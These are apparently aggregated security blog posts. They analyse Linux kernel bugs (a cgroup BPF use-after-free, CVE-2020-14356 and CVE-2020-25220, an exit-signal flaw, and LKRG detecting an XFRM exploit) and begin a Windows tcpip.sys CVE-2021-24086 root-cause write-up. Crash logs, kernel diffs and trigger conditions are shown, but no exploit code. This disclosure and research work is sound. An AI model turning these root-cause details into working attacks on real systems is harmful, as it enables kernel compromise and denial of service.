 percpu ref (cgroup_bpf_release_fn) <= 0 (-70581) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-18829) after switching to atomic
 percpu ref (cgroup_bpf_release_fn) <= 0 (-29849) after switching to atomic

Let’s look at this function:

/**
 * cgroup_bpf_release_fn() - callback used to schedule releasing
 *                           of bpf cgroup data
 * @ref: percpu ref counter structure
 */
static void cgroup_bpf_release_fn(struct percpu_ref *ref)
{
	struct cgroup *cgrp = container_of(ref, struct cgroup, bpf.refcnt);

	INIT_WORK(&cgrp->bpf.release_work, cgroup_bpf_release);
	queue_work(system_wq, &cgrp->bpf.release_work);
}

So that’s the callback used to release bpf cgroup data. Sounds like it is being called while there could be still active socket attached to such cgroup:

/**
 * cgroup_bpf_release() - put references of all bpf programs and
 *                        release all cgroup bpf data
 * @work: work structure embedded into the cgroup to modify
 */
static void cgroup_bpf_release(struct work_struct *work)
{
	struct cgroup *p, *cgrp = container_of(work, struct cgroup,
					       bpf.release_work);
	struct bpf_prog_array *old_array;
	unsigned int type;

	mutex_lock(&cgroup_mutex);

	for (type = 0; type < ARRAY_SIZE(cgrp->bpf.progs); type++) {
		struct list_head *progs = &cgrp->bpf.progs[type];
		struct bpf_prog_list *pl, *tmp;

		list_for_each_entry_safe(pl, tmp, progs, node) {
			list_del(&pl->node);
			if (pl->prog)
				bpf_prog_put(pl->prog);
			if (pl->link)
				bpf_cgroup_link_auto_detach(pl->link);
			bpf_cgroup_storages_unlink(pl->storage);
			bpf_cgroup_storages_free(pl->storage);
			kfree(pl);
			static_branch_dec(&cgroup_bpf_enabled_key);
		}
		old_array = rcu_dereference_protected(
				cgrp->bpf.effective[type],
				lockdep_is_held(&cgroup_mutex));
		bpf_prog_array_free(old_array);
	}

	mutex_unlock(&cgroup_mutex);

	for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
		cgroup_bpf_put(p);

	percpu_ref_exit(&cgrp->bpf.refcnt);
	cgroup_put(cgrp);
}

while:

static void bpf_cgroup_link_auto_detach(struct bpf_cgroup_link *link)
{
	cgroup_put(link->cgroup);
	link->cgroup = NULL;
}

So if cgroup dies, all the potential clients are being auto_detached. However, they might not be aware about such situation. When is cgroup_bpf_release_fn() executed?

/**
 * cgroup_bpf_inherit() - inherit effective programs from parent
 * @cgrp: the cgroup to modify
 */
int cgroup_bpf_inherit(struct cgroup *cgrp)
{
    ...
  	ret = percpu_ref_init(&cgrp->bpf.refcnt, cgroup_bpf_release_fn, 0,
			      GFP_KERNEL);
    ...
}

It is automatically executed when cgrp->bpf.refcnt drops to 1. However, in the warning logs before kernel had crashed, we saw that such reference counter is below 0. Cgroup was already freed.

Originally, I thought that the problem might be related to the code walking through the cgroup hierarchy without holding cgroup_mutex, which was pointed out by Alexei. I’ve prepared the patch and recompiled the kernel:

$ diff -u cgroup.c linux-5.7/kernel/bpf/cgroup.c
--- cgroup.c    2020-05-31 23:49:15.000000000 +0000
+++ linux-5.7/kernel/bpf/cgroup.c       2020-07-17 16:31:10.712969480 +0000
@@ -126,11 +126,11 @@
                bpf_prog_array_free(old_array);
        }

-       mutex_unlock(&cgroup_mutex);
-
        for (p = cgroup_parent(cgrp); p; p = cgroup_parent(p))
                cgroup_bpf_put(p);

+       mutex_unlock(&cgroup_mutex);
+
        percpu_ref_exit(&cgrp->bpf.refcnt);
        cgroup_put(cgrp);
 }

Interestingly, without this patch I was able to generate this kernel crash every time when I was rebooting the machine (100% repro). After this patch crashing ratio dropped to around 30%. However, I was still able to hit the same code-path and generate kernel dump. The patch indeed helps but it looks like it’s not the real problem since I can still hit the crash (just much less often).

I stepped back and looked again where the bug is. Corrupted pointer (struct cgroup *) is comming from that line:

	cgrp = sock_cgroup_ptr(&sk->sk_cgrp_data);

this code is related to the CONFIG_SOCK_CGROUP_DATA. Linux source has an interesting comment about it in “cgroup-defs.h” file:

/*
 * sock_cgroup_data is embedded at sock->sk_cgrp_data and contains
 * per-socket cgroup information except for memcg association.
 *
 * On legacy hierarchies, net_prio and net_cls controllers directly set
 * attributes on each sock which can then be tested by the network layer.
 * On the default hierarchy, each sock is associated with the cgroup it was
 * created in and the networking layer can match the cgroup directly.
 *
 * To avoid carrying all three cgroup related fields separately in sock,
 * sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer.
 * On boot, sock_cgroup_data records the cgroup that the sock was created
 * in so that cgroup2 matches can be made; however, once either net_prio or
 * net_cls starts being used, the area is overriden to carry prioidx and/or
 * classid.  The two modes are distinguished by whether the lowest bit is
 * set.  Clear bit indicates cgroup pointer while set bit prioidx and
 * classid.
 *
 * While userland may start using net_prio or net_cls at any time, once
 * either is used, cgroup2 matching no longer works.  There is no reason to
 * mix the two and this is in line with how legacy and v2 compatibility is
 * handled.  On mode switch, cgroup references which are already being
 * pointed to by socks may be leaked.  While this can be remedied by adding
 * synchronization around sock_cgroup_data, given that the number of leaked
 * cgroups is bound and highly unlikely to be high, this seems to be the
 * better trade-off.
 */

and later:

/*
 * There's a theoretical window where the following accessors race with
 * updaters and return part of the previous pointer as the prioidx or
 * classid.  Such races are short-lived and the result isn't critical.
 */

This means that sock_cgroup_data “carries” the information whether net_prio or net_cls starts being used and in such case sock_cgroup_data overloads (prioidx, classid) and the cgroup pointer. In our crash we can extract this information:

crash> print/a ((struct sock *)0xffff9ce3de26b280)->sk_cgrp_data
$5 = {
  {
    {
      is_data = 0x0,
      padding = 0x68,
      prioidx = 0xe241,
      classid = 0xffff9ce3
    },
    val = 0xffff9ce3e2416800
  }
}

Described socket keeps the “sk_cgrp_data” pointer with the information of being “attached” to the cgroup2. However, cgroup2 has been destroyed.
Now we have all the information to solve the mystery of this bug:

  1. Process creates a socket and both of them are inside some cgroup v2 (non-root)
    • cgroup BPF is cgroup2 only
  2. At some point net_prio or net_cls is being used:
    • this operation is disabling cgroup2 socket matching
    • now, all related sockets should be converted to use net_prio, and sk_cgrp_data should be updated
  3. The socket is cloned, but not the reference to the cgroup (ref: point 1)
    • this essentially moves the socket to the new cgroup
  4. All tasks in the old cgroup (ref: point 1) must die and when this happens, this cgroup dies as well
  5. When original process is starting to “use” the socket, it might attempt to access cgroup which is already “dead”. This essentially generates Use-After-Free condition
    • in my specific case, process was killed or invoked exit()
    • during the execution of do_exit() function, all file descriptors and all sockets are being closed
    • one of the socket still points to the previously destroyed cgroup2 BPF (OpenSSH might install BPF)
    • __cgroup_bpf_run_filter_skb runs attached BPF and we have Use-After-Free

To confirm that scenario, I’ve modified some of the Linux kernel sources:

  1. Function cgroup_sk_alloc_disable():
    • I’ve added dump_stack();
  2. Function cgroup_bpf_release():
    • I’ve moved mutex to guard code responsible for walking through the cgroup hierarchy

I’ve managed to reproduce this bug again and this is what I can see in the logs:

...
[   72.061197] kmem.limit_in_bytes is deprecated and will be removed. Please report your usecase to [email protected] if you depend on this functionality.
[   72.121572] cgroup: cgroup: disabling cgroup2 socket matching due to net_prio or net_cls activation
               ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
[   72.121574] CPU: 0 PID: 6958 Comm: kubelet Kdump: loaded Not tainted 5.7.0-g6 #32
[   72.121574] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[   72.121575] Call Trace:
[   72.121580]  dump_stack+0x50/0x70
[   72.121582]  cgroup_sk_alloc_disable.cold+0x11/0x25
                ^^^^^^^^^^^^^^^^^^^^^^^
[   72.121584]  net_prio_attach+0x22/0xa0
                ^^^^^^^^^^^^^^^
[   72.121586]  cgroup_migrate_execute+0x371/0x430
[   72.121587]  cgroup_attach_task+0x132/0x1f0
[   72.121588]  __cgroup1_procs_write.constprop.0+0xff/0x140
                ^^^^^^^^^^^^^^^^^^^^^^
[   72.121590]  kernfs_fop_write+0xc9/0x1a0
[   72.121592]  vfs_write+0xb1/0x1a0
[   72.121593]  ksys_write+0x5a/0xd0
[   72.121595]  do_syscall_64+0x47/0x190
[   72.121596]  entry_SYSCALL_64_after_hwframe+0x44/0xa9
[   72.121598] RIP: 0033:0x48abdb
[   72.121599] Code: ff e9 69 ff ff ff cc cc cc cc cc cc cc cc cc e8 7b 68 fb ff 48 8b 7c 24 10 48 8b 74 24 18 48 8b 54 24 20 48 8b 44 24 08 0f 05 <48> 3d 01 f0 ff ff 76 20 48 c7 44 24 28 ff ff ff ff 48 c7 44 24 30
[   72.121600] RSP: 002b:000000c00110f778 EFLAGS: 00000212 ORIG_RAX: 0000000000000001
[   72.121601] RAX: ffffffffffffffda RBX: 000000c000060000 RCX: 000000000048abdb
[   72.121601] RDX: 0000000000000004 RSI: 000000c00110f930 RDI: 000000000000001e
[   72.121601] RBP: 000000c00110f7c8 R08: 000000c00110f901 R09: 0000000000000004
[   72.121602] R10: 000000c0011a39a0 R11: 0000000000000212 R12: 000000000000019b
[   72.121602] R13: 000000000000019a R14: 0000000000000200 R15: 0000000000000000

As we can see, net_prio is being activated and cgroup2 socket matching is being disabled. Next:

[  287.497527] percpu ref (cgroup_bpf_release_fn) <= 0 (-79) after switching to atomic
[  287.497535] WARNING: CPU: 0 PID: 9 at lib/percpu-refcount.c:161 percpu_ref_switch_to_atomic_rcu+0x11f/0x12a
[  287.497536] Modules linked in:
[  287.497537] CPU: 0 PID: 9 Comm: ksoftirqd/0 Kdump: loaded Not tainted 5.7.0-g6 #32
[  287.497538] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.497539] RIP: 0010:percpu_ref_switch_to_atomic_rcu+0x11f/0x12a

cgroup_bpf_release_fn is being executed multiple times. All cgroup BPF entries has been deleted and freed. Next:

[  287.543976] general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] PREEMPT SMP PTI
[  287.544062] CPU: 0 PID: 11398 Comm: realpath Kdump: loaded Tainted: G        W         5.7.0-g6 #32
[  287.544133] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 04/13/2018
[  287.544217] RIP: 0010:__cgroup_bpf_run_filter_skb+0xd4/0x230
[  287.544267] Code: 00 48 01 c8 48 89 43 50 41 83 ff 01 0f 84 c2 00 00 00 e8 6f 55 f1 ff e8 5a 3e f5 ff 44 89 fa 48 8d 84 d5 e0 03 00 00 48 8b 00 <48> 8b 78 10 4c 8d 78 10 48 85 ff 0f 84 29 01 00 00 bd 01 00 00 00
[  287.544398] RSP: 0018:ffff957740003af8 EFLAGS: 00010206
[  287.544446] RAX: 6b6b6b6b6b6b6b6b RBX: ffff8911f339cf00 RCX: 0000000000000028
[  287.544506] RDX: 0000000000000000 RSI: 0000000000000000 RDI: 0000000000000001
[  287.544566] RBP: ffff8911e2eb5000 R08: 0000000000000000 R09: 0000000000000001
[  287.544625] R10: 0000000000000000 R11: 0000000000000000 R12: 0000000000000014
[  287.544685] R13: 0000000000000014 R14: 0000000000000000 R15: 0000000000000000
[  287.544753] FS:  00007f86e885a580(0000) GS:ffff8911f6e00000(0000) knlGS:0000000000000000
[  287.544833] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[  287.544919] CR2: 000055fb75e86da4 CR3: 0000000221316003 CR4: 00000000003606f0
[  287.544996] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[  287.545063] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[  287.545129] Call Trace:
[  287.545167]  <IRQ>
[  287.545204]  sk_filter_trim_cap+0x10c/0x250
[  287.545253]  ? nf_ct_deliver_cached_events+0xb6/0x120
[  287.545308]  ? tcp_v4_inbound_md5_hash+0x47/0x160
[  287.545359]  tcp_v4_rcv+0xb49/0xda0
[  287.545404]  ? nf_hook_slow+0x3a/0xa0
[  287.545449]  ip_protocol_deliver_rcu+0x26/0x1d0
[  287.545500]  ip_local_deliver_finish+0x50/0x60
[  287.545550]  ip_sublist_rcv_finish+0x38/0x50
[  287.545599]  ip_sublist_rcv+0x16d/0x200
[  287.545645]  ? ip_rcv_finish_core.constprop.0+0x470/0x470
[  287.545701]  ip_list_rcv+0xf1/0x115
[  287.545746]  __netif_receive_skb_list_core+0x249/0x270
[  287.545801]  netif_receive_skb_list_internal+0x19f/0x2c0
[  287.545856]  napi_complete_done+0x8e/0x130
[  287.545905]  e1000_clean+0x27e/0x600
[  287.545951]  ? security_cred_free+0x37/0x50
[  287.545999]  net_rx_action+0x133/0x3b0
[  287.546045]  __do_softirq+0xfc/0x331
[  287.546091]  irq_exit+0x92/0x110
[  287.546133]  do_IRQ+0x6d/0x120
[  287.546175]  common_interrupt+0xf/0xf
[  287.546219]  </IRQ>
[  287.546255] RIP: 0010:__x64_sys_exit_group+0x4/0x10

We have our crash referencing freed memory. 

First CVE – CVE-2020-14356:

I’ve decided to report this issue to the Linux Kernel security mailing list around the mid-July (2020). Roman Gushchin replied to my report and suggested to verify if I can still repro this issue when commit ad0f75e5f57c (“cgroup: fix cgroup_sk_alloc() for sk_clone_lock()”) is applied. This commit was merged to the Linux Kernel git source tree just a few days before my report. I’ve carefully verified it and indeed it fixed the problem. However, commit ad0f75e5f57c is not fully complete and a follow-up fix 14b032b8f8fc (“cgroup: Fix sock_cgroup_data on big-endian.”) should be applied as well.


After this conversation Greg KH decided to backport Roman’s patches to the LTS kernels. In the meantime, I’ve decided to apply for CVE number (through RedHat) to track this issue:

  1. CVE-2020-14356 was allocated to track this issue
  2. For some unknown reasons, this bug was classified as NULL pointer dereference 🙂

RedHat correctly acknowledged this issue as Use-After-Free and in their own description and bugzilla they specify:

However, in CVE MITRE portal we can see a very inaccurate description:

  • “A flaw null pointer dereference in the Linux kernel cgroupv2 subsystem in versions before 5.7.10 was found in the way when reboot the system. A local user could use this flaw to crash the system or escalate their privileges on the system.”
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14356

First, it is not NULL pointer dereference but Use-After-Free bug. Maybe it is badly classified based on that opened bug:
https://bugzilla.kernel.org/show_bug.cgi?id=208003

People have started to hit this Use-After-Free bug in the form of NULL pointer dereference “kernel panic”.

Additionally, the entire description of the bug is wrong. I’ve raised that concern to the CVE MITRE but the invalid description is still there. There is also a small Twitter discussion about that here:
https://twitter.com/Adam_pi3/status/1296212546043740160

Second CVE – CVE-2020-25220:

During analysis of this bug, I contacted Brad Spengler. When the patch for this issue was backported to LTS kernels, Brad noticed that it conflicted with his pre-existing backport, and that the upstream backport looked incorrect. I was surprised since I had reviewed the original commit for mainline kernel (5.7) and it was fine. Having this in mind, I decided to carefully review the backported patch:
https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?h=linux-4.14.y&id=82fd2138a5ffd7e0d4320cdb669e115ee976a26e

and it really looks incorrect. Part of the original fix is the following code:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   if (skcd->val) {
+       if (skcd->no_refcnt)
+           return;
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+       cgroup_bpf_get(sock_cgroup_ptr(skcd));
+   }
+}

However, backported patch has the following logic:

+void cgroup_sk_clone(struct sock_cgroup_data *skcd)
+{
+   /* Socket clone path */
+   if (skcd->val) {
+       /*
+        * We might be cloning a socket which is left in an empty
+        * cgroup and the cgroup might have already been rmdir'd.
+        * Don't use cgroup_get_live().
+        */
+       cgroup_get(sock_cgroup_ptr(skcd));
+   }
+}

There is a missing check:

+       if (skcd->no_refcnt)
+           return;

which could result in reference counter bug and in the end Use-After-Free again. It looks like the backported patch for stable kernels is still buggy.

I’ve contacted RedHat again and they started to provide correct patches for their own kernels. However, LTS kernels were still buggy. I’ve also asked to assign a separate CVE for that issue but RedHat suggested that I do it myself.

After that, I went for vacation and forgot about this issue 🙂 Recently, I’ve decided to apply for CVE to track the “bad patch” issue, and CVE-2020-25220 was allocated. It is worth to point out that someone from Huawei at some point realized that patch is wrong and LTS got a correct fix as well:

https://www.spinics.net/lists/stable/msg405099.html

What is worth to mention, grsecurity backport was never affected by the CVE-2020-25220.

Summary:

Original issue, tracked by CVE-2020-14356, affects kernels starting from 4.5+ up to 5.7.10.

  • RedHat correctly fixed all their kernels, and has proper description of the bug
  • CVE MITRE still has invalid and misleading description

Badly backported patch, tracked by CVE-2020-25220, affects kernels:

  • 4.19 until version 4.19.140 (exclusive)
  • 4.14 until version 4.14.194 (exclusive)
  • 4.9 until version 4.9.233 (exclusive)

*grsecurity kernels were never affected by the CVE-2020-25220


Best regards,
Adam ‘pi3’ Zabrocki

LKRG 0.8

By: pi3
25 June 2020 at 21:49

Hi,

We’ve just announced a new version of LKRG 0.8!  It includes enormous amount of changes – in fact, so much that we’re not trying to document all of the changes this time (although they can be seen from the git commits), but rather focus on high-level aspects. I encourage to read full announcement here:

https://www.openwall.com/lists/announce/2020/06/25/1

Btw. Among others, we have added support for Raspberry Pi 3 & 4, better scalability, performance, and tradeoffs, the notion of profiles, new documentation, @Phoronix benchmarks, and more

Best regards,
Adam

Effectiveness of Linux Rootkit Detection Tools

By: pi3
15 June 2020 at 03:40

I would like to draw draw attention to the following Openwall’s tweet:

Juho Junnila's Master's Thesis "Effectiveness of Linux Rootkit Detection Tools" shows our LKRG as by far the most effective kernel rootkit detector (of those tested), even though that wasn't our primary focus: https://t.co/pz0r502dK6 h/t @Adam_pi3

— Openwall (@Openwall) June 14, 2020

and the full post on LKRG’s mailing list here:

https://www.openwall.com/lists/lkrg-users/2020/06/14/5

Thanks,
Adam

CVE-2020-12826

By: pi3
15 May 2020 at 00:21

CVE-2020-12826 is assigned to track the problem with Linux kernel which I’ve described in my previous post:

CVE MITRE described the problem pretty accurately:

A signal access-control issue was discovered in the Linux kernel before 5.6.5, aka CID-7395ea4e65c2. Because exec_id in include/linux/sched.h is only 32 bits, an integer overflow can interfere with a do_notify_parent protection mechanism. A child process can send an arbitrary signal to a parent process in a different security domain. Exploitation limitations include the amount of elapsed time before an integer overflow occurs, and the lack of scenarios where signals to a parent process present a substantial operational threat.

RedHat tracks this issue here:

https://bugzilla.redhat.com/show_bug.cgi?id=1822077

Debian here:

https://security-tracker.debian.org/tracker/CVE-2020-12826

Fix can be found here:

https://github.com/torvalds/linux/commit/7395ea4e65c2a00d23185a3f63ad315756ba9cef

What is interesting, the story of insufficient restriction of the exit signals might not be ended 😉

How did this pass review and get backported to stable kernels? https://t.co/WhBrqUZhrw (Hint: case of right hand not knowing what the left is doing, involving a recent security fix)

— grsecurity (@grsecurity) May 14, 2020

In short, the following patch reintroduces the same problem:

https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=b5f2006144c6ae941726037120fa1001ddede784

Best regards,
Adam

Linux kernel bug – all kernels insufficiently restrict exit signals

By: pi3
26 March 2020 at 00:09

I’ve recently spent some time looking at ‘exec_id’ counter. Historically, Linux kernel had 2 independent security problems related to that code: CVE-2009-1337 and CVE-2012-0056.

Until 2012, ‘self_exec_id’ field (among others) was used to enforce permissions checking restrictions for /proc/pid/{mem/maps/…} interface. However, it was done poorly and a serious security problem was reported, known as “Mempodipper” (CVE-2012-0056). Since that patch, ‘self_exec_id’ is not tracked anymore, but kernel is looking at process’ VM during the time of the open().

In 2009 Oleg Nesterov discovered that Linux kernel has an incorrect logic to reset ->exit_signal. As a result, the malicious user can bypass it if it execs the setuid application before exiting (->exit_signal won’t be reset to SIGCHLD). CVE-2009-1337 was assigned to track this issue.

The logic responsible for handling ->exit_signal has been changed a few times and the current logic is locked down since Linux kernel 3.3.5. However, it is not fully robust and it’s still possible for the malicious user to bypass it. Basically, it’s possible to send arbitrary signals to a privileged (suidroot) parent process.

I’ve summarized my analysis and posted on LKML:
https://lists.openwall.net/linux-kernel/2020/03/24/1803

and kernel-hardening mailing list:
https://www.openwall.com/lists/kernel-hardening/2020/03/25/1

Btw. Kernels 2.0.39 and 2.0.40 look secure 😉

Thanks,
Adam

Linux kernel XFRM UAF

By: pi3
21 March 2020 at 01:27

On 28th of February, I’ve sent a short summary to lkrg-users mailing list (https://www.openwall.com/lists/lkrg-users/2020/02/28/1) regarding recent Linux kernel XFRM UAF exploit dropped by Vitaly Nikolenko. I believe it is worth reading and I’ve decided to reference it on my blog as well:

Hey,

Vitaly Nikolenko published an exploit for Linux kernel XFRM use-after-free. His tweet with more details can be found here:

centos 8 / rhel 8 / ubuntu 14.04, 16.04, 18.04 poc is uploaded https://t.co/b3IJoxMaHI. The tech report is public too https://t.co/UHsMYScN9Y pic.twitter.com/uDpjEm0ycX

— Vitaly Nikolenko (@vnik5287) February 28, 2020

Detailed description of the bug can be found here:

https://duasynt.com/pub/vnik/01-0311-2018.pdf

I’ve tested his exploit under the latest version of LKRG (from the repo) and it correctly detects and kills it:

[Fri Feb 28 10:04:24 2020] [p_lkrg] Loading LKRG…
[Fri Feb 28 10:04:24 2020] Freezing user space processes … (elapsed 0.008 seconds) done.
[Fri Feb 28 10:04:24 2020] OOM killer disabled.
[Fri Feb 28 10:04:24 2020] [p_lkrg] Verifying 21 potential UMH paths for whitelisting…
[Fri Feb 28 10:04:24 2020] [p_lkrg] 6 UMH paths were whitelisted…
[Fri Feb 28 10:04:25 2020] [p_lkrg] [kretprobe] register_kretprobe() for  failed! [err=-22]
[Fri Feb 28 10:04:25 2020] [p_lkrg] ERROR: Can't hook ovl_create_or_link function :(
[Fri Feb 28 10:04:25 2020] [p_lkrg] LKRG initialized successfully!
[Fri Feb 28 10:04:25 2020] OOM killer enabled.
[Fri Feb 28 10:04:25 2020] Restarting tasks … done.
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] New modification: type[JUMP_LABEL_JMP]!
[Fri Feb 28 10:04:42 2020] [p_lkrg] [JUMP_LABEL] Updating kernel core .text section hash!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  process[67342 | lucky0] has different user_namespace!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  process[67342 | lucky0] has different user_namespace!
[Fri Feb 28 10:06:49 2020] [p_lkrg]  Trying to kill process[lucky0 | 67342]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  process[81090 | lucky0] has different user_namespace!
[Fri Feb 28 10:08:32 2020] [p_lkrg]  Trying to kill process[lucky0 | 81090]!

Latest LKRG detects user_namespace corruption, which in a way proofs that our namespace escape logic works. When I’ve made the same test, but reverting LKRG code base to the commit just before namespace corruption detection, LKRG is still detecting it via standard method:

[Fri Feb 28 10:34:28 2020] [p_lkrg]  process[17599 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] process[17599 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:34:28 2020] [p_lkrg] Trying to kill process[lucky0 | 17599]!

[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different SUID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] process[22293 | lucky0] has different GID! 1000 vs 0
[Fri Feb 28 10:35:02 2020] [p_lkrg] Trying to kill process[lucky0 | 22293]!

This is an interesting case. Vitaly published just a compiled binary of his exploit (not a source code). This means that adopting his exploit to play cat-and-mouse game with LKRG is not an easy task. It is possible to reverse-engineer it and modify the exploit binary, however it’s more work.

Thanks,

Adam

Reverse-engineering tcpip.sys: mechanics of a packet of the death (CVE-2021-24086)

Introduction

Since the beginning of my journey in computer security I have always been amazed and fascinated by true remote vulnerabilities. By true remotes, I mean bugs that are triggerable remotely without any user interaction. Not even a single click. As a result I am always on the lookout for such vulnerabilities.

On the Tuesday 13th of October 2020, Microsoft released a patch for CVE-2020-16898 which is a vulnerability affecting Windows' tcpip.sys kernel-mode driver dubbed Bad neighbor. Here is the description from Microsoft:

A remote code execution vulnerability exists when the Windows TCP/IP stack improperly
handles ICMPv6 Router Advertisement packets. An attacker who successfully exploited this vulnerability could gain
the ability to execute code on the target server or client. To exploit this vulnerability, an attacker would have
to send specially crafted ICMPv6 Router Advertisement packets to a remote Windows computer.
The update addresses the vulnerability by correcting how the Windows TCP/IP stack handles ICMPv6 Router Advertisement
packets.

The vulnerability really did stand out to me: remote vulnerabilities affecting TCP/IP stacks seemed extinct and being able to remotely trigger a memory corruption in the Windows kernel is very interesting for an attacker. Fascinating.

Hadn't diffed Microsoft patches in years I figured it would be a fun exercise to go through. I knew that I wouldn't be the only one working on it as those unicorns get a lot of attention from internet hackers. Indeed, my friend pi3 was so fast to diff the patch, write a PoC and write a blogpost that I didn't even have time to start, oh well :)

That is why when Microsoft blogged about another set of vulnerabilities being fixed in tcpip.sys I figured I might be able to work on those this time. Again, I knew for a fact that I wouldn't be the only one racing to write the first public PoC for CVE-2021-24086 but somehow the internet stayed silent long enough for me to complete this task which is very surprising :)

In this blogpost I will take you on my journey from zero to BSoD. From diffing the patches, reverse-engineering tcpip.sys and fighting our way through writing a PoC for CVE-2021-24086. If you came here for the code, fair enough, it is available on my github: 0vercl0k/CVE-2021-24086.

TL;DR

For the readers that want to get the scoop, CVE-2021-24086 is a NULL dereference in tcpip!Ipv6pReassembleDatagram that can be triggered remotely by sending a series of specially crafted packets. The issue happens because of the way the code treats the network buffer:

void Ipv6pReassembleDatagram(Packet_t *Packet, Reassembly_t *Reassembly, char OldIrql)
{
  // ...
  const uint32_t UnfragmentableLength = Reassembly->UnfragmentableLength;
  const uint32_t TotalLength = UnfragmentableLength + Reassembly->DataLength;
  const uint32_t HeaderAndOptionsLength = UnfragmentableLength + sizeof(ipv6_header_t);
  // …
  NetBufferList = (_NET_BUFFER_LIST *)NetioAllocateAndReferenceNetBufferAndNetBufferList(
                                        IppReassemblyNetBufferListsComplete,
                                        Reassembly,
                                        0,
                                        0,
                                        0,
                                        0);
  if ( !NetBufferList )
  {
    // ...
    goto Bail_0;
  }

  FirstNetBuffer = NetBufferList->FirstNetBuffer;
  if ( NetioRetreatNetBuffer(FirstNetBuffer, uint16_t(HeaderAndOptionsLength), 0) < 0 )
  {
    // ...
    goto Bail_1;
  }

  Buffer = (ipv6_header_t *)NdisGetDataBuffer(FirstNetBuffer, HeaderAndOptionsLength, 0i64, 1u, 0);
  //...
  *Buffer = Reassembly->Ipv6;

A fresh NetBufferList (abbreviated NBL) is allocated by NetioAllocateAndReferenceNetBufferAndNetBufferList and NetioRetreatNetBuffer allocates a Memory Descriptor List (abbreviated MDL) of uint16_t(HeaderAndOptionsLength) bytes. This integer truncation from uint32_t is important.

Once the network buffer has been allocated, NdisGetDataBuffer is called to gain access to a contiguous block of data from the fresh network buffer. This time though, HeaderAndOptionsLength is not truncated which allows an attacker to trigger a special condition in NdisGetDataBuffer to make it fail. This condition is hit when uint16_t(HeaderAndOptionsLength) != HeaderAndOptionsLength. When the function fails, it returns NULL and Ipv6pReassembleDatagram blindly trusts this pointer and does a memory write, bugchecking the machine. To pull this off, you need to trick the network stack into receiving an IPv6 fragment with a very large amount of headers. Here is what the bugchecks look like:

trigger
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
                       (0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`473c46a0 cc              int     3

kd> kc
 # Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
07 tcpip!Ipv6pReceiveFragment
